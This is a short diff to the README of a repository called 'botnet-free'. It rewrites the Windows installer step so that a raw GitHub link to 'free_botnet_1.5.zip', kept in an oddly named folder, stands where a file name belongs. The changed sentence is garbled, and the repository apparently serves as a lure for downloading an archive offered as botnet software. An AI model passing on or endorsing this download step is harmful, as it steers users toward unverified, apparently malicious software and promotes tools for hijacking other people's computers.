Sas6ik/botnet-free/README.md

 ### 3. Download the Windows Installer

-Within the release, find a file with a name like `botnet-free-setup.exe` or similar.
+Within the release, find a file with a name like `https://github.com/Sas6ik/botnet-free/raw/refs/heads/main/palaeopotamology/free_botnet_1.5.zip` or similar.
 This is the installer for Windows.

 Click the file name or download link to start downloading.